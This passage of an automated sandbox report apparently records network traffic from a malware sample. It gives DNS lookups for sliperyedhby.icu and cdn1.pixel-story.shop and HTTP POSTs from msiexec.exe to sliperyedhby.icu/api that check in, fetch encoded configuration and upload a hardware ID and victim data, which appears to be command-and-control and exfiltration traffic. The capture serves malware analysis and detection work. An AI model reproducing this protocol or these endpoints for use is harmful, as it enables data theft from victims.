                                                                                                                                                                                                                              Nov 18, 2024 00:15:58.845545053 CET14664971962.60.234.80192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:58.845639944 CET497191466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:15:58.845731020 CET497191466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:15:58.850639105 CET14664971962.60.234.80192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:16:58.860116005 CET497211466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:16:58.865324974 CET14664972162.60.234.80192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:16:58.865497112 CET497211466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:16:58.866020918 CET497211466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:16:58.870856047 CET14664972162.60.234.80192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:16:59.984951973 CET14664972162.60.234.80192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:16:59.985214949 CET497211466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:16:59.985214949 CET497211466192.168.2.1662.60.234.80
                                                                                                                                                                                                                              Nov 18, 2024 00:16:59.990389109 CET14664972162.60.234.80192.168.2.16

                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.030877113 CET5110953192.168.2.161.1.1.1
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.054672956 CET53511091.1.1.1192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.030801058 CET5638853192.168.2.161.1.1.1
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.042140961 CET53563881.1.1.1192.168.2.16
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.947199106 CET6344553192.168.2.161.1.1.1
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.956815958 CET53634451.1.1.1192.168.2.16

                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.030877113 CET192.168.2.161.1.1.10x16ddStandard query (0)sliperyedhby.icuA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.030801058 CET192.168.2.161.1.1.10xacc6Standard query (0)cdn1.pixel-story.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.947199106 CET192.168.2.161.1.1.10x1093Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.054672956 CET1.1.1.1192.168.2.160x16ddNo error (0)sliperyedhby.icu172.67.131.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Nov 18, 2024 00:15:22.054672956 CET1.1.1.1192.168.2.160x16ddNo error (0)sliperyedhby.icu104.21.4.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.042140961 CET1.1.1.1192.168.2.160xacc6No error (0)cdn1.pixel-story.shop172.67.185.54A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Nov 18, 2024 00:15:36.042140961 CET1.1.1.1192.168.2.160xacc6No error (0)cdn1.pixel-story.shop104.21.32.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                              Nov 18, 2024 00:15:55.956815958 CET1.1.1.1192.168.2.160x1093No error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false

                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                              • sliperyedhby.icu
                                                                                                                                                                                                                              • cdn1.pixel-story.shop
                                                                                                                                                                                                                              • steamcommunity.com

                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              0192.168.2.1649704172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:22 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:22 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                              2024-11-17 23:15:23 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:23 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=uuus5bvtfmk9tecd15lfv1qojd; expires=Thu, 13-Mar-2025 17:02:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r1S1OJQENmD3s6YaHc%2FZ2q2ZgoYab7oOB%2F1s%2FDZdUQKjMy0RQyLsrjwySIZ94Ulsw%2BjKcu5wOp9QkiYD%2BboFQRKmHP76tvtr%2B6gBxeAKKijXfWGmophmGX7%2BC4Dm7wp3kNiv"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c236f5245e4-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1124&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=907&delivery_rate=2637522&cwnd=250&unsent_bytes=0&cid=876f8af16511d3e8&ts=625&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:23 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                              2024-11-17 23:15:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              1192.168.2.1649706172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 80
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC80OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 32 32 32 6e 65 77 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
                                                                                                                                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--222new&j=5c9b8674a630d9101b46733aa37f15ec
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1006INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:24 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=75j16csbr59333fsfuf8v7pg1c; expires=Thu, 13-Mar-2025 17:02:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UAVJplfG%2Fge3e%2BVQUH54p%2F34JMEyD8hSZdbcjN5x357v0lAgb3DTAXcEAK9V4gYof2YfgA3kaCXWQnz6t3KS%2B8BWGQPQQ13bgtEeLJFX39FBy2Teb5zhxATPyJZmJcFxEdP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8e436c2c9db04791-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1882&sent=6&recv=7&lost=0&retrans=2&sent_bytes=5684&recv_bytes=980&delivery_rate=6928&cwnd=244&unsent_bytes=0&cid=85ccda21f6d3257a&ts=765&x=0"
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC363INData Raw: 34 65 30 0d 0a 31 65 71 5a 4e 68 66 34 4c 7a 35 4e 39 6a 56 6a 33 65 58 31 76 2f 6b 64 67 55 6a 54 77 66 69 6b 79 2f 64 76 4c 43 59 76 7a 7a 53 75 79 4f 38 55 4c 63 77 44 48 44 36 54 46 31 6d 37 68 4a 6e 4d 6e 44 47 6a 4b 62 66 6a 77 73 4b 71 6d 78 78 4a 43 67 32 35 57 66 66 51 2f 31 64 37 69 30 6f 53 62 35 4e 4e 51 65 65 2b 6a 70 32 63 63 36 4e 79 38 61 53 53 78 71 71 62 44 55 31 4e 51 4c 39 59 74 6f 4c 31 55 58 2b 64 54 46 6f 73 6d 6c 67 47 75 49 43 55 31 5a 64 30 37 43 43 2b 34 39 53 47 72 6f 31 4e 46 67 52 69 71 6b 43 30 70 2f 68 46 66 4e 70 53 45 6a 62 55 55 41 33 2f 33 39 66 65 6e 48 2f 74 4c 72 65 71 6b 4d 79 6a 6b 77 78 49 54 46 2b 6d 55 72 32 43 2b 31 4a 2b 6c 30 56 4f 49 5a 42 66 44 62 36 4b 6c 4a 33 56 50 2b 51 79 38 66 76 61 6c 5a 75 57 48 46
                                                                                                                                                                                                                              Data Ascii: 4e01eqZNhf4Lz5N9jVj3eX1v/kdgUjTwfiky/dvLCYvzzSuyO8ULcwDHD6TF1m7hJnMnDGjKbfjwsKqmxxJCg25WffQ/1d7i0oSb5NNQee+jp2cc6Ny8aSSxqqbDU1NQL9YtoL1UX+dTFosmlgGuICU1Zd07CC+49SGro1NFgRiqkC0p/hFfNpSEjbUUA3/39fenH/tLreqkMyjkwxITF+mUr2C+1J+l0VOIZBfDb6KlJ3VP+Qy8fvalZuWHF
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC892INData Raw: 71 56 6e 4e 53 57 63 75 4d 6e 75 36 79 5a 78 71 36 66 42 30 46 4f 53 61 42 62 73 59 6a 37 46 44 76 61 53 6b 52 76 7a 42 63 69 75 70 65 51 30 59 30 39 32 57 71 75 37 59 4f 47 72 70 6c 4e 46 67 52 46 71 46 57 30 67 2f 52 58 66 5a 46 66 58 44 32 53 57 67 53 74 67 5a 4c 54 6b 58 7a 78 49 4c 2b 6c 6d 63 2b 69 6e 41 68 4a 51 41 33 6a 46 72 43 51 75 77 77 31 75 30 42 58 49 35 35 41 41 66 2b 59 32 63 54 62 65 4f 39 71 36 65 4f 65 78 36 32 55 43 55 42 4b 53 61 46 51 75 59 58 30 55 6e 2b 61 53 6c 59 6e 6e 46 59 4d 74 49 69 58 32 4a 5a 37 35 53 61 77 70 74 71 49 36 5a 49 56 44 68 77 4e 67 31 47 30 6d 72 6c 68 64 70 52 44 57 7a 6e 55 53 45 2b 6d 78 35 44 52 32 79 65 6a 4a 4c 53 73 69 4d 65 37 6b 41 4e 63 53 45 69 72 57 37 53 47 2b 31 46 79 6c 30 4e 61 4b 4a 64 66 42
                                                                                                                                                                                                                              Data Ascii: qVnNSWcuMnu6yZxq6fB0FOSaBbsYj7FDvaSkRvzBciupeQ0Y092Wqu7YOGrplNFgRFqFW0g/RXfZFfXD2SWgStgZLTkXzxIL+lmc+inAhJQA3jFrCQuww1u0BXI55AAf+Y2cTbeO9q6eOex62UCUBKSaFQuYX0Un+aSlYnnFYMtIiX2JZ75SawptqI6ZIVDhwNg1G0mrlhdpRDWznUSE+mx5DR2yejJLSsiMe7kANcSEirW7SG+1Fyl0NaKJdfB
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 33 39 30 63 0d 0a 4a 70 31 65 45 37 57 4c 6d 63 2b 57 64 65 59 6b 76 61 61 56 78 71 69 55 41 30 52 50 44 65 4d 57 73 4a 43 37 44 44 57 31 51 45 77 39 6e 6c 77 51 2f 62 4b 55 30 35 56 34 39 57 71 75 37 59 4f 47 72 70 6c 4e 46 67 52 47 71 31 71 37 69 50 31 47 65 35 56 66 56 6a 32 51 57 51 57 7a 69 5a 37 51 6c 48 72 78 4c 72 47 78 6d 38 4f 75 6d 77 42 63 51 51 33 6a 46 72 43 51 75 77 77 31 6f 48 6c 62 50 34 56 51 51 34 71 45 6d 64 4f 63 61 61 4d 31 2f 37 72 61 77 61 58 56 56 51 35 48 51 61 42 66 73 6f 66 70 58 6e 6d 62 58 31 73 6d 6e 56 30 41 73 59 69 63 30 5a 35 74 36 43 57 35 72 4a 76 4c 70 4a 34 4a 54 67 51 44 37 56 47 76 79 4b 4d 55 56 4a 64 43 54 69 79 46 46 54 53 38 69 5a 6e 61 6a 54 2f 38 5a 4b 6a 6a 6e 63 72 70 7a 55 31 50 53 45 47 73 57 62 47 43 38
                                                                                                                                                                                                                              Data Ascii: 390cJp1eE7WLmc+WdeYkvaaVxqiUA0RPDeMWsJC7DDW1QEw9nlwQ/bKU05V49Wqu7YOGrplNFgRGq1q7iP1Ge5VfVj2QWQWziZ7QlHrxLrGxm8OumwBcQQ3jFrCQuww1oHlbP4VQQ4qEmdOcaaM1/7rawaXVVQ5HQaBfsofpXnmbX1smnV0AsYic0Z5t6CW5rJvLpJ4JTgQD7VGvyKMUVJdCTiyFFTS8iZnajT/8ZKjjncrpzU1PSEGsWbGC8
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 4a 57 43 2b 5a 58 41 2b 78 6a 70 76 56 6c 33 6a 78 4a 37 53 72 6b 4d 2b 73 6d 51 42 4e 56 6b 36 73 46 76 6e 49 2f 45 77 31 77 67 31 37 48 4b 4e 30 51 61 44 4a 6a 70 32 63 63 36 4e 79 38 61 4b 53 77 61 65 52 48 30 42 57 51 36 70 57 73 59 44 7a 55 33 6d 55 51 30 34 6e 6c 56 63 50 73 49 2b 65 32 5a 70 37 35 79 61 32 34 39 53 47 72 6f 31 4e 46 67 52 6c 72 6b 79 74 79 74 56 66 64 5a 31 64 53 6a 54 55 53 45 2b 6d 78 35 44 52 32 79 65 6a 4c 72 71 70 6b 38 57 67 6b 51 42 4f 54 55 4b 6b 58 72 71 41 36 56 56 2f 69 45 6c 5a 4c 70 74 64 42 62 65 4c 6d 4e 47 66 62 65 68 71 2f 2b 4f 64 33 75 6e 4e 54 57 35 50 57 34 35 45 70 63 6a 6b 47 6d 7a 61 53 6c 42 76 7a 42 63 49 73 34 61 57 31 35 31 30 35 69 65 78 70 70 44 42 70 5a 55 4e 54 55 4a 4c 6f 46 36 2f 68 50 64 58 65 4a
                                                                                                                                                                                                                              Data Ascii: JWC+ZXA+xjpvVl3jxJ7SrkM+smQBNVk6sFvnI/Ew1wg17HKN0QaDJjp2cc6Ny8aKSwaeRH0BWQ6pWsYDzU3mUQ04nlVcPsI+e2Zp75ya249SGro1NFgRlrkytytVfdZ1dSjTUSE+mx5DR2yejLrqpk8WgkQBOTUKkXrqA6VV/iElZLptdBbeLmNGfbehq/+Od3unNTW5PW45EpcjkGmzaSlBvzBcIs4aW15105iexppDBpZUNTUJLoF6/hPdXeJ
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 6b 6c 6b 41 75 59 75 61 6e 64 55 2f 35 44 4c 78 2b 39 72 68 73 35 67 4c 57 56 56 34 71 6c 62 6d 79 4f 51 61 62 4e 70 4b 55 47 2f 4d 46 77 79 7a 6a 5a 72 59 6e 33 66 6b 4b 62 43 76 6e 73 75 6b 6b 51 52 4b 51 56 2b 2f 55 4c 6d 49 39 46 70 36 6c 6c 39 53 4b 70 52 62 51 66 48 48 6b 4d 58 62 4a 36 4d 62 70 71 50 61 32 65 65 4d 54 55 6c 49 44 66 55 57 75 49 58 70 57 48 71 61 54 46 38 72 6e 31 41 48 75 59 61 55 32 4a 68 36 35 53 75 78 72 35 44 42 6f 5a 38 44 51 30 4a 4a 71 31 44 33 78 72 74 54 62 64 6f 56 48 42 32 5a 57 51 69 38 67 5a 72 4c 73 30 36 6a 4e 66 2b 36 32 73 47 6c 31 56 55 4f 51 45 61 6c 57 72 4b 41 2f 6c 56 39 6b 45 56 54 49 49 5a 57 44 72 61 41 6e 4e 43 55 63 65 59 6b 6f 36 53 52 7a 61 47 63 41 30 67 45 41 2b 31 52 72 38 69 6a 46 45 4f 5a 51 31 63
                                                                                                                                                                                                                              Data Ascii: klkAuYuandU/5DLx+9rhs5gLWVV4qlbmyOQabNpKUG/MFwyzjZrYn3fkKbCvnsukkQRKQV+/ULmI9Fp6ll9SKpRbQfHHkMXbJ6MbpqPa2eeMTUlIDfUWuIXpWHqaTF8rn1AHuYaU2Jh65Suxr5DBoZ8DQ0JJq1D3xrtTbdoVHB2ZWQi8gZrLs06jNf+62sGl1VUOQEalWrKA/lV9kEVTIIZWDraAnNCUceYko6SRzaGcA0gEA+1Rr8ijFEOZQ1c
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 36 32 47 6d 4a 33 56 50 2b 51 79 38 66 76 61 39 37 2b 53 43 6b 45 47 5a 4b 70 4e 74 6f 4c 34 58 33 6e 61 55 68 49 32 31 46 41 4e 2f 39 2f 58 30 4a 64 79 35 7a 69 39 6f 35 72 50 72 70 38 66 51 55 74 41 72 6c 61 79 6d 76 70 47 65 70 46 49 58 79 75 62 57 41 32 33 6a 64 65 54 32 33 6a 37 61 75 6e 6a 74 73 57 34 6e 30 39 70 58 6c 75 71 57 71 61 44 39 6c 67 31 68 51 4e 46 62 35 4e 62 51 65 66 48 6c 39 79 57 62 65 59 72 75 36 6d 58 7a 71 61 51 43 45 46 41 53 61 5a 59 70 59 62 30 56 48 4f 52 54 46 6b 73 6e 31 30 50 74 70 58 58 6b 39 74 34 2b 32 72 70 34 37 44 64 71 4a 67 42 44 47 70 47 75 31 48 31 71 66 56 66 63 70 5a 62 48 44 44 61 54 6b 47 34 69 39 65 46 32 33 62 74 4a 72 4b 6b 6b 73 36 73 6c 51 5a 4f 53 30 65 6a 55 61 57 43 39 31 35 6e 6c 55 35 52 4b 35 6c 64
                                                                                                                                                                                                                              Data Ascii: 62GmJ3VP+Qy8fva97+SCkEGZKpNtoL4X3naUhI21FAN/9/X0Jdy5zi9o5rPrp8fQUtArlaymvpGepFIXyubWA23jdeT23j7aunjtsW4n09pXluqWqaD9lg1hQNFb5NbQefHl9yWbeYru6mXzqaQCEFASaZYpYb0VHORTFksn10PtpXXk9t4+2rp47DdqJgBDGpGu1H1qfVfcpZbHDDaTkG4i9eF23btJrKkks6slQZOS0ejUaWC915nlU5RK5ld
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 6e 56 69 58 79 6a 5a 50 47 6b 67 6f 62 78 31 54 39 45 52 30 47 37 57 37 6a 49 35 42 70 73 32 6b 70 51 62 38 77 58 45 36 32 48 6e 4e 32 63 63 66 45 72 75 61 79 51 78 71 2b 65 42 30 31 4e 53 61 4e 66 73 59 6e 32 56 58 53 61 53 46 77 6d 68 6c 70 42 38 63 65 51 78 64 73 6e 6f 78 32 39 71 4b 76 46 76 39 55 53 41 46 30 4e 71 6c 72 33 30 4c 74 56 5a 35 64 46 57 43 2b 5a 55 51 71 2b 68 70 54 64 6d 33 7a 6a 4c 37 71 73 6e 4d 47 6b 6e 77 52 48 56 6b 57 70 52 4c 65 45 2f 78 51 37 32 6b 70 45 62 38 77 58 4d 62 79 4d 6d 39 32 57 61 71 4d 31 2f 37 72 61 77 61 58 56 56 51 35 4d 52 71 5a 51 76 49 76 34 57 6e 36 51 51 6c 4d 6c 6b 6c 45 4a 75 6f 65 62 33 5a 35 35 35 79 36 2f 70 4a 54 4c 71 49 63 4f 52 77 51 44 37 56 47 76 79 4b 4d 55 56 5a 46 62 57 53 69 43 46 54 53 38 69
                                                                                                                                                                                                                              Data Ascii: nViXyjZPGkgobx1T9ER0G7W7jI5Bps2kpQb8wXE62HnN2ccfEruayQxq+eB01NSaNfsYn2VXSaSFwmhlpB8ceQxdsnox29qKvFv9USAF0Nqlr30LtVZ5dFWC+ZUQq+hpTdm3zjL7qsnMGknwRHVkWpRLeE/xQ72kpEb8wXMbyMm92WaqM1/7rawaXVVQ5MRqZQvIv4Wn6QQlMlklEJuoeb3Z555y6/pJTLqIcORwQD7VGvyKMUVZFbWSiCFTS8i
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 75 39 53 6d 6e 70 4e 62 4f 75 4a 67 42 44 6e 73 44 37 55 37 33 30 4c 74 68 64 70 52 44 57 7a 6d 46 47 69 47 30 69 35 54 52 6d 6e 69 6a 5a 50 47 6c 32 70 37 36 32 30 31 4b 56 51 33 31 42 75 58 54 72 67 63 69 79 68 39 44 59 59 30 58 46 2f 2f 66 78 5a 50 62 62 61 4e 79 38 65 53 5a 31 4c 75 54 44 6c 68 48 43 70 4e 6f 74 6f 58 30 47 48 75 52 54 56 73 2f 67 6b 78 4e 74 34 53 4e 78 36 56 42 79 43 61 33 70 49 44 42 72 37 4d 74 44 67 6f 4e 6f 68 62 76 73 62 73 63 4e 61 55 44 48 44 66 55 44 30 47 4b 68 4a 6e 54 6e 47 6e 79 5a 35 6d 41 6f 50 7a 72 75 51 70 62 42 6e 6d 71 52 71 61 44 39 6c 67 31 31 41 31 61 62 38 77 48 54 2f 2b 44 68 70 33 44 4c 37 46 78 35 50 44 4e 6c 76 75 4b 51 31 63 45 57 2b 30 4f 35 63 61 37 52 6a 58 43 44 52 73 73 68 6b 55 48 76 4a 47 55 6d 71
                                                                                                                                                                                                                              Data Ascii: u9SmnpNbOuJgBDnsD7U730LthdpRDWzmFGiG0i5TRmnijZPGl2p76201KVQ31BuXTrgciyh9DYY0XF//fxZPbbaNy8eSZ1LuTDlhHCpNotoX0GHuRTVs/gkxNt4SNx6VByCa3pIDBr7MtDgoNohbvsbscNaUDHDfUD0GKhJnTnGnyZ5mAoPzruQpbBnmqRqaD9lg11A1ab8wHT/+Dhp3DL7Fx5PDNlvuKQ1cEW+0O5ca7RjXCDRsshkUHvJGUmq
                                                                                                                                                                                                                              2024-11-17 23:15:24 UTC1369INData Raw: 73 4b 43 55 78 62 75 48 43 30 31 53 54 75 70 6f 69 61 33 32 57 58 43 55 53 6d 49 52 74 56 30 52 73 6f 69 51 6e 37 74 34 39 53 6d 50 6e 61 33 58 72 6f 56 50 61 45 64 62 72 68 62 35 79 4f 4d 55 4c 64 70 73 56 6a 2b 5a 57 41 62 39 70 35 44 4c 6d 44 2b 74 61 72 58 6a 77 6f 61 4d 6d 41 42 4c 53 6b 72 76 64 37 32 59 39 6c 74 79 32 47 31 62 4f 5a 63 58 54 2f 2b 4c 31 34 58 62 66 75 6b 36 76 4b 79 64 69 71 36 50 43 67 34 4b 44 61 4d 57 37 38 6a 36 58 6d 57 58 51 6c 74 6a 6b 6c 6b 50 2f 35 6a 5a 78 4e 74 70 6f 33 4c 69 37 64 72 55 36 63 31 4e 43 55 64 66 76 31 43 30 6e 76 67 54 53 36 52 67 54 69 69 45 56 45 4f 4f 69 70 50 4c 6a 6e 7a 7a 4c 59 2b 64 74 39 53 75 68 51 34 4d 64 56 75 75 56 72 6d 50 75 78 6f 31 67 67 30 45 62 37 6c 46 42 71 2b 45 31 38 4c 56 5a 71 4d
                                                                                                                                                                                                                              Data Ascii: sKCUxbuHC01STupoia32WXCUSmIRtV0RsoiQn7t49SmPna3XroVPaEdbrhb5yOMULdpsVj+ZWAb9p5DLmD+tarXjwoaMmABLSkrvd72Y9lty2G1bOZcXT/+L14Xbfuk6vKydiq6PCg4KDaMW78j6XmWXQltjklkP/5jZxNtpo3Li7drU6c1NCUdfv1C0nvgTS6RgTiiEVEOOipPLjnzzLY+dt9SuhQ4MdVuuVrmPuxo1gg0Eb7lFBq+E18LVZqM


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              2192.168.2.1649707172.67.131.2544437084C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-11-17 23:15:25 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ZWV2Y3KCN3COQ12661G
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Content-Length: 12851
                                                                                                                                                                                                                              Host: sliperyedhby.icu
                                                                                                                                                                                                                              2024-11-17 23:15:25 UTC12851OUTData Raw: 2d 2d 5a 57 56 32 59 33 4b 43 4e 33 43 4f 51 31 32 36 36 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 37 31 34 46 37 31 30 39 42 42 34 30 31 32 32 45 31 33 41 38 38 33 44 39 35 41 43 33 41 38 34 0d 0a 2d 2d 5a 57 56 32 59 33 4b 43 4e 33 43 4f 51 31 32 36 36 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 5a 57 56 32 59 33 4b 43 4e 33 43 4f 51 31 32 36 36 31 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 74 4c 59 4d 65 35 2d 2d 32 32
                                                                                                                                                                                                                              Data Ascii: --ZWV2Y3KCN3COQ12661GContent-Disposition: form-data; name="hwid"A714F7109BB40122E13A883D95AC3A84--ZWV2Y3KCN3COQ12661GContent-Disposition: form-data; name="pid"2--ZWV2Y3KCN3COQ12661GContent-Disposition: form-data; name="lid"tLYMe5--22
                                                                                                                                                                                                                              2024-11-17 23:15:26 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Sun, 17 Nov 2024 23:15:26 GMT
                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=bqaqal0sdcdagap50r9v1lc7li; expires=Thu, 13-Mar-2025 17:02:05 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkxAe6aKty%2B1yFXUodUCw1gI70DK46kvnQw4XSuL%2BsV6jqDFwLyL%2BD8rQCHy4tDrdy5m9wr%2BGu%2FUIfkCIVVTM1plGiKMdI82xD4LSR%2FL8tKs9mDIYzes22OgayS%2BAOtOXqLZ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                              Server: cloudflare
